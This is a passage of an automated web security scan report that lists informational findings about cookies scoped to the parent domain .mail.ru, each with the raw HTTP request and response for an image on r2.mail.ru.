p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526055.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/gif
Content-Length: 122
Connection: keep-alive
Set-Cookie: p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...K.....\.r.J...J.y.8...............49.............n..3V.>..i.Z....k...m..2...;

15.35. http://r2.mail.ru/b12526056.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526056.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526056.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3722
Connection: keep-alive
Set-Cookie: p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.4..
...[SNIP]...

15.36. http://r2.mail.ru/b12526057.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526057.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526057.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2843
Connection: keep-alive
Set-Cookie: p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.7..
...[SNIP]...

15.37. http://r2.mail.ru/b12526058.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526058.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526058.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3343
Connection: keep-alive
Set-Cookie: p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.0..
...[SNIP]...

15.38. http://r2.mail.ru/b12526059.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526059.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526059.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2876
Connection: keep-alive
Set-Cookie: p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F....
...[SNIP]...

15.39. http://r2.mail.ru/b12526060.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526060.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526060.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 3123
Connection: keep-alive
Set-Cookie: p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.7..
...[SNIP]...

15.40. http://r2.mail.ru/b12526061.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526061.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526061.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3005
Connection: keep-alive
Set-Cookie: p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.4..
...[SNIP]...

15.41. http://r2.mail.ru/b12526062.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526062.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526062.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3109
Connection: keep-alive
Set-Cookie: p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.7..
...[SNIP]...

15.42. http://r2.mail.ru/b12526063.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526063.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526063.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 2846
Connection: keep-alive
Set-Cookie: p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.6..
...[SNIP]...

15.43. http://r2.mail.ru/b12526064.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526064.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526064.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 2433
Connection: keep-alive
Set-Cookie: p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................F.6..
...[SNIP]...

15.44. http://r2.mail.ru/b12526065.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526065.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526065.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/gif
Content-Length: 119
Connection: keep-alive
Set-Cookie: p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...H.....\.r.J...J.y.8.............-.....T...x..n..)kL.3..>;.P.t.Q..-f#.....;

15.45. http://r2.mail.ru/b12526191.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526191.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526191.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 535
Connection: keep-alive
Set-Cookie: p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........f.=p.2h.......8nz..`~.b.....4[....2Z....Ce....Km..T.Il......e'R~Lm....c...Bt...$N{...... Ix..d......8_..*aLo....Hl..7m....5k........../fa.]|..3h=c....,U..1h.......Ar.........Qr.!L|.2iG
...[SNIP]...

15.46. http://r2.mail.ru/b12526192.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526192.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526192.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 165
Connection: keep-alive
Set-Cookie: p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.......`t.@|.=|.Qx.E|.=.L|.9..D~.G.@.................................................................!..Created with GIMP.,........... .@.p...4....@C.5.C..;

15.47. http://r2.mail.ru/b12526193.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526193.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526193.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 636
Connection: keep-alive
Set-Cookie: p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........(......]..':.7T.../................................................#H.#H...................e.....j........cv....0K.........................l...............:@..................Wc.[s.....
...[SNIP]...

15.48. http://r2.mail.ru/b12526194.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526194.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526194.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 93
Connection: keep-alive
Set-Cookie: p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........Us.....*..!.......,................#..."...jJ......&....X
....+X..u....
.DC..;

15.49. http://r2.mail.ru/b12526208.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526208.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526208.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 132
Connection: keep-alive
Set-Cookie: p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a/..................!.......,..../.....U.....c.......(.........j..[...
........H..p...7.)e../.B1M....4"5\...V...2`<8.........;

15.50. http://r2.mail.ru/b12526210.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526210.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526210.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
